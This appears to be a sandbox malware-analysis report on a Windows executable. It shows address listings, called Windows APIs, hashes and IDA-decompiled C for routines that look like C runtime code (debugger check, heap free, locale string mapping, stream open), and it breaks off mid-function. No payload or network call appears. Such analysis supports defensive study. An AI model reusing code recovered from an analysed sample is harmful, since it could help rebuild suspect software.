                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce09
                                                                        0x0040ce0f
                                                                        0x0040ce11
                                                                        0x0040ce11
                                                                        0x00413644
                                                                        0x00413649
                                                                        0x0041364f
                                                                        0x00413655
                                                                        0x0041365b
                                                                        0x00413661
                                                                        0x00413667
                                                                        0x0041366e
                                                                        0x00413675
                                                                        0x0041367c
                                                                        0x00413683
                                                                        0x0041368a
                                                                        0x00413691
                                                                        0x00413692
                                                                        0x0041369b
                                                                        0x004136a3
                                                                        0x004136ab
                                                                        0x004136b6
                                                                        0x004136c0
                                                                        0x004136c5
                                                                        0x004136ca
                                                                        0x004136d4
                                                                        0x004136de
                                                                        0x004136e3
                                                                        0x004136e9
                                                                        0x004136ee
                                                                        0x004136fa
                                                                        0x004136ff
                                                                        0x00413701
                                                                        0x00413709
                                                                        0x00413714
                                                                        0x00413721
                                                                        0x00413723
                                                                        0x00413725
                                                                        0x0041372a
                                                                        0x0041373e

                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID:
                                                                        • API String ID: 2579439406-0
                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr* _t11;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				_t5 =  *(__ecx + 8);
                                                                        				 *__ecx = 0x41eff0;
                                                                        				if(_t5 != 0) {
                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                        				}
                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                        					_t5 = GetProcessHeap();
                                                                        					if(_t5 != 0) {
                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}





                                                                        0x0040adb3
                                                                        0x0040adb5
                                                                        0x0040adb8
                                                                        0x0040adc0
                                                                        0x0040adc8
                                                                        0x0040adc8
                                                                        0x0040adce
                                                                        0x0040add0
                                                                        0x0040add8
                                                                        0x00000000
                                                                        0x0040ade1
                                                                        0x0040add8
                                                                        0x0040ade8

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3859560861-0
                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t110;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t113;
                                                                        				short* _t115;
                                                                        				short* _t116;
                                                                        				char* _t120;
                                                                        				short* _t121;
                                                                        				short* _t123;
                                                                        				short* _t127;
                                                                        				int _t128;
                                                                        				short* _t141;
                                                                        				signed int _t144;
                                                                        				void* _t146;
                                                                        				short* _t147;
                                                                        				signed int _t150;
                                                                        				short* _t153;
                                                                        				char* _t157;
                                                                        				int _t160;
                                                                        				long _t162;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t179;
                                                                        				int _t182;
                                                                        				short* _t184;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				short* _t189;
                                                                        				int _t191;
                                                                        				intOrPtr _t194;
                                                                        				int _t207;
                                                                        
                                                                        				_t110 =  *0x422234; // 0x5a9fcee
                                                                        				_v8 = _t110 ^ _t188;
                                                                        				_t184 = __ecx;
                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                        				if(_t194 == 0) {
                                                                        					_t182 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                        						_t162 = GetLastError();
                                                                        						__eflags = _t162 - 0x78;
                                                                        						if(_t162 == 0x78) {
                                                                        							 *0x423e7c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x423e7c = 1;
                                                                        					}
                                                                        				}
                                                                        				if(_a16 <= 0) {
                                                                        					L13:
                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                        						_v16 = 0;
                                                                        						_v20 = 0;
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                        						}
                                                                        						__eflags = _a28;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                        						_v24 = _t113;
                                                                        						__eflags = _t113 - 0xffffffff;
                                                                        						if(_t113 != 0xffffffff) {
                                                                        							__eflags = _t113 - _a28;
                                                                        							if(_t113 == _a28) {
                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                        								L78:
                                                                        								__eflags = _v16;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_v16);
                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                        								}
                                                                        								_t115 = _v20;
                                                                        								__eflags = _t115;
                                                                        								if(_t115 != 0) {
                                                                        									__eflags = _a20 - _t115;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t115);
                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                        									}
                                                                        								}
                                                                        								_t116 = _t184;
                                                                        								goto L84;
                                                                        							}
                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                        							_t191 =  &(_t189[0xc]);
                                                                        							_v16 = _t120;
                                                                        							__eflags = _t120;
                                                                        							if(_t120 == 0) {
                                                                        								goto L58;
                                                                        							}
                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                        							_v12 = _t121;
                                                                        							__eflags = _t121;
                                                                        							if(__eflags != 0) {
                                                                        								if(__eflags <= 0) {
                                                                        									L71:
                                                                        									_t182 = 0;
                                                                        									__eflags = 0;
                                                                        									L72:
                                                                        									__eflags = _t182;
                                                                        									if(_t182 == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                        									_v12 = _t123;
                                                                        									__eflags = _t123;
                                                                        									if(_t123 != 0) {
                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                        										_v20 = _t186;
                                                                        										asm("sbb esi, esi");
                                                                        										_t184 =  ~_t186 & _v12;
                                                                        										__eflags = _t184;
                                                                        									} else {
                                                                        										_t184 = 0;
                                                                        									}
                                                                        									E004147AE(_t182);
                                                                        									goto L78;
                                                                        								}
                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                        								if(_t121 > 0xffffffe0) {
                                                                        									goto L71;
                                                                        								}
                                                                        								_t127 =  &(_t121[4]);
                                                                        								__eflags = _t127 - 0x400;
                                                                        								if(_t127 > 0x400) {
                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                        									__eflags = _t128;
                                                                        									if(_t128 != 0) {
                                                                        										 *_t128 = 0xdddd;
                                                                        										_t128 = _t128 + 8;
                                                                        										__eflags = _t128;
                                                                        									}
                                                                        									_t182 = _t128;
                                                                        									goto L72;
                                                                        								}
                                                                        								E0040CFB0(_t127);
                                                                        								_t182 = _t191;
                                                                        								__eflags = _t182;
                                                                        								if(_t182 == 0) {
                                                                        									goto L62;
                                                                        								}
                                                                        								 *_t182 = 0xcccc;
                                                                        								_t182 = _t182 + 8;
                                                                        								goto L72;
                                                                        							}
                                                                        							L62:
                                                                        							_t184 = 0;
                                                                        							goto L78;
                                                                        						} else {
                                                                        							goto L58;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t112 != 1) {
                                                                        							L58:
                                                                        							_t116 = 0;
                                                                        							L84:
                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t184 = MultiByteToWideChar;
                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                        						_t207 = _t182;
                                                                        						if(_t207 == 0) {
                                                                        							goto L58;
                                                                        						} else {
                                                                        							if(_t207 <= 0) {
                                                                        								L28:
                                                                        								_v16 = 0;
                                                                        								L29:
                                                                        								if(_v16 == 0) {
                                                                        									goto L58;
                                                                        								}
                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                        									L52:
                                                                        									E004147AE(_v16);
                                                                        									_t116 = _v12;
                                                                        									goto L84;
                                                                        								}
                                                                        								_t184 = LCMapStringW;
                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                        								_v12 = _t174;
                                                                        								if(_t174 == 0) {
                                                                        									goto L52;
                                                                        								}
                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                        									__eflags = _t174;
                                                                        									if(_t174 <= 0) {
                                                                        										L44:
                                                                        										_t184 = 0;
                                                                        										__eflags = 0;
                                                                        										L45:
                                                                        										__eflags = _t184;
                                                                        										if(_t184 != 0) {
                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        												__eflags = _a24;
                                                                        												if(_a24 != 0) {
                                                                        													_push(_a24);
                                                                        													_push(_a20);
                                                                        												} else {
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        												}
                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                        											}
                                                                        											E004147AE(_t184);
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t144 = 0xffffffe0;
                                                                        									_t179 = _t144 % _t174;
                                                                        									__eflags = _t144 / _t174 - 2;
                                                                        									if(_t144 / _t174 < 2) {
                                                                        										goto L44;
                                                                        									}
                                                                        									_t52 = _t174 + 8; // 0x8
                                                                        									_t146 = _t174 + _t52;
                                                                        									__eflags = _t146 - 0x400;
                                                                        									if(_t146 > 0x400) {
                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                        										__eflags = _t147;
                                                                        										if(_t147 != 0) {
                                                                        											 *_t147 = 0xdddd;
                                                                        											_t147 =  &(_t147[4]);
                                                                        											__eflags = _t147;
                                                                        										}
                                                                        										_t184 = _t147;
                                                                        										goto L45;
                                                                        									}
                                                                        									E0040CFB0(_t146);
                                                                        									_t184 = _t189;
                                                                        									__eflags = _t184;
                                                                        									if(_t184 == 0) {
                                                                        										goto L52;
                                                                        									}
                                                                        									 *_t184 = 0xcccc;
                                                                        									_t184 =  &(_t184[4]);
                                                                        									goto L45;
                                                                        								}
                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                        								}
                                                                        								goto L52;
                                                                        							}
                                                                        							_t150 = 0xffffffe0;
                                                                        							_t179 = _t150 % _t182;
                                                                        							if(_t150 / _t182 < 2) {
                                                                        								goto L28;
                                                                        							}
                                                                        							_t25 = _t182 + 8; // 0x8
                                                                        							_t152 = _t182 + _t25;
                                                                        							if(_t182 + _t25 > 0x400) {
                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                        								__eflags = _t153;
                                                                        								if(_t153 == 0) {
                                                                        									L27:
                                                                        									_v16 = _t153;
                                                                        									goto L29;
                                                                        								}
                                                                        								 *_t153 = 0xdddd;
                                                                        								L26:
                                                                        								_t153 =  &(_t153[4]);
                                                                        								goto L27;
                                                                        							}
                                                                        							E0040CFB0(_t152);
                                                                        							_t153 = _t189;
                                                                        							if(_t153 == 0) {
                                                                        								goto L27;
                                                                        							}
                                                                        							 *_t153 = 0xcccc;
                                                                        							goto L26;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t178 = _a16;
                                                                        				_t157 = _a12;
                                                                        				while(1) {
                                                                        					_t178 = _t178 - 1;
                                                                        					if( *_t157 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t157 =  &(_t157[1]);
                                                                        					if(_t178 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t178 = _t178 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				_t160 = _a16 - _t178 - 1;
                                                                        				if(_t160 < _a16) {
                                                                        					_t160 = _t160 + 1;
                                                                        				}
                                                                        				_a16 = _t160;
                                                                        				goto L13;
                                                                        			}











































                                                                        0x00417089
                                                                        0x00417090
                                                                        0x00417098
                                                                        0x0041709a
                                                                        0x004170a0
                                                                        0x004170a6
                                                                        0x004170bb
                                                                        0x004170c5
                                                                        0x004170cb
                                                                        0x004170ce
                                                                        0x004170d0
                                                                        0x004170d0
                                                                        0x004170bd
                                                                        0x004170bd
                                                                        0x004170bd
                                                                        0x004170bb
                                                                        0x004170dd
                                                                        0x00417101
                                                                        0x00417101
                                                                        0x00417109
                                                                        0x004172bb
                                                                        0x004172be
                                                                        0x004172c1
                                                                        0x004172c4
                                                                        0x004172cb
                                                                        0x004172cb
                                                                        0x004172ce
                                                                        0x004172d1
                                                                        0x004172d8
                                                                        0x004172d8
                                                                        0x004172de
                                                                        0x004172e4
                                                                        0x004172e7
                                                                        0x004172ea
                                                                        0x004172f3
                                                                        0x004172f6
                                                                        0x004173ef
                                                                        0x004173f1
                                                                        0x004173f1
                                                                        0x004173f4
                                                                        0x004173f6
                                                                        0x004173f9
                                                                        0x004173fe
                                                                        0x004173ff
                                                                        0x00417402
                                                                        0x00417404
                                                                        0x00417406
                                                                        0x00417409
                                                                        0x0041740b
                                                                        0x0041740c
                                                                        0x00417411
                                                                        0x00417409
                                                                        0x00417412
                                                                        0x00000000
                                                                        0x00417412
                                                                        0x00417309
                                                                        0x0041730e
                                                                        0x00417311
                                                                        0x00417314
                                                                        0x00417316
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041732a
                                                                        0x0041732c
                                                                        0x0041732f
                                                                        0x00417331
                                                                        0x0041733a
                                                                        0x00417379
                                                                        0x00417379
                                                                        0x00417379
                                                                        0x0041737b
                                                                        0x0041737b
                                                                        0x0041737d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417384
                                                                        0x0041739c
                                                                        0x0041739e
                                                                        0x004173a1
                                                                        0x004173a3
                                                                        0x004173bf
                                                                        0x004173c1
                                                                        0x004173c9
                                                                        0x004173cb
                                                                        0x004173cb
                                                                        0x004173a5
                                                                        0x004173a5
                                                                        0x004173a5
                                                                        0x004173cf
                                                                        0x00000000
                                                                        0x004173d4
                                                                        0x0041733c
                                                                        0x0041733f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417341
                                                                        0x00417344
                                                                        0x00417349
                                                                        0x00417362
                                                                        0x00417368
                                                                        0x0041736a
                                                                        0x0041736c
                                                                        0x00417372
                                                                        0x00417372
                                                                        0x00417372
                                                                        0x00417375
                                                                        0x00000000
                                                                        0x00417375
                                                                        0x0041734b
                                                                        0x00417350
                                                                        0x00417352
                                                                        0x00417354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417356
                                                                        0x0041735c
                                                                        0x00000000
                                                                        0x0041735c
                                                                        0x00417333
                                                                        0x00417333
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417117
                                                                        0x0041711a
                                                                        0x004172ec
                                                                        0x004172ec
                                                                        0x00417414
                                                                        0x00417425
                                                                        0x00417425
                                                                        0x00417120
                                                                        0x00417126
                                                                        0x0041712d
                                                                        0x0041712d
                                                                        0x00417130
                                                                        0x00417153
                                                                        0x00417155
                                                                        0x00417157
                                                                        0x00000000
                                                                        0x0041715d
                                                                        0x0041715d
                                                                        0x004171a2
                                                                        0x004171a2
                                                                        0x004171a5
                                                                        0x004171a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004171c1
                                                                        0x004172aa
                                                                        0x004172ad
                                                                        0x004172b2
                                                                        0x00000000
                                                                        0x004172b5
                                                                        0x004171c7
                                                                        0x004171db
                                                                        0x004171dd
                                                                        0x004171e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004171ef
                                                                        0x0041721a
                                                                        0x0041721c
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417263
                                                                        0x00417265
                                                                        0x00417265
                                                                        0x00417267
                                                                        0x00417277
                                                                        0x0041727d
                                                                        0x0041727f
                                                                        0x00417281
                                                                        0x00417282
                                                                        0x00417283
                                                                        0x00417286
                                                                        0x0041728c
                                                                        0x0041728f
                                                                        0x00417288
                                                                        0x00417288
                                                                        0x00417289
                                                                        0x00417289
                                                                        0x004172a0
                                                                        0x004172a0
                                                                        0x004172a4
                                                                        0x004172a9
                                                                        0x00000000
                                                                        0x00417267
                                                                        0x00417222
                                                                        0x00417223
                                                                        0x00417225
                                                                        0x00417228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041722a
                                                                        0x0041722a
                                                                        0x0041722e
                                                                        0x00417233
                                                                        0x0041724c
                                                                        0x00417252
                                                                        0x00417254
                                                                        0x00417256
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725c
                                                                        0x0041725f
                                                                        0x00000000
                                                                        0x0041725f
                                                                        0x00417235
                                                                        0x0041723a
                                                                        0x0041723c
                                                                        0x0041723e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417240
                                                                        0x00417246
                                                                        0x00000000
                                                                        0x00417246
                                                                        0x004171f4
                                                                        0x00417213
                                                                        0x00417213
                                                                        0x00000000
                                                                        0x004171f4
                                                                        0x00417163
                                                                        0x00417164
                                                                        0x00417169
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041716b
                                                                        0x0041716b
                                                                        0x00417174
                                                                        0x0041718a
                                                                        0x00417190
                                                                        0x00417192
                                                                        0x0041719d
                                                                        0x0041719d
                                                                        0x00000000
                                                                        0x0041719d
                                                                        0x00417194
                                                                        0x0041719a
                                                                        0x0041719a
                                                                        0x00000000
                                                                        0x0041719a
                                                                        0x00417176
                                                                        0x0041717b
                                                                        0x0041717f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00000000
                                                                        0x00417181
                                                                        0x00417157
                                                                        0x00417109
                                                                        0x004170df
                                                                        0x004170e2
                                                                        0x004170e5
                                                                        0x004170e5
                                                                        0x004170e8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ea
                                                                        0x004170ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x004170f7
                                                                        0x004170fb
                                                                        0x004170fd
                                                                        0x004170fd
                                                                        0x004170fe
                                                                        0x00000000

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,008718D8), ref: 004170C5
                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                        • __freea.LIBCMT ref: 004172A4
                                                                        • __freea.LIBCMT ref: 004172AD
                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                        • _malloc.LIBCMT ref: 00417362
                                                                        • _memset.LIBCMT ref: 00417384
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                        • __freea.LIBCMT ref: 004173CF
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                        • String ID:
                                                                        • API String ID: 3809854901-0
                                                                        • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                        • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004057B0(intOrPtr* __eax) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t57;
                                                                        				char* _t60;
                                                                        				char _t62;
                                                                        				intOrPtr _t63;
                                                                        				char _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr* _t83;
                                                                        				void* _t86;
                                                                        				char* _t88;
                                                                        				char* _t89;
                                                                        				intOrPtr* _t91;
                                                                        				intOrPtr* _t93;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        				void* _t103;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = _t97 | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                        				_t91 = __eax;
                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                        					_t101 = _t100 + 4;
                                                                        					if(_t93 == 0) {
                                                                        						L31:
                                                                        						return 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                        						 *_t93 = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                        						_t102 = _t101 + 0xc;
                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                        						_t87 = _t57 + 1;
                                                                        						do {
                                                                        							_t82 =  *_t57;
                                                                        							_t57 = _t57 + 1;
                                                                        						} while (_t82 != 0);
                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                        						_t103 = _t102 + 4;
                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                        						if(_t60 == 0) {
                                                                        							L30:
                                                                        							E00405160(0, _t87, _t93);
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                        							_t88 = _t60;
                                                                        							goto L7;
                                                                        							L9:
                                                                        							L9:
                                                                        							if( *_t91 == 0x72) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                        							}
                                                                        							_t63 =  *_t91;
                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                        							}
                                                                        							_t64 =  *_t91;
                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                        								__eflags = _t64 - 0x66;
                                                                        								if(_t64 != 0x66) {
                                                                        									__eflags = _t64 - 0x68;
                                                                        									if(_t64 != 0x68) {
                                                                        										__eflags = _t64 - 0x52;
                                                                        										if(_t64 != 0x52) {
                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
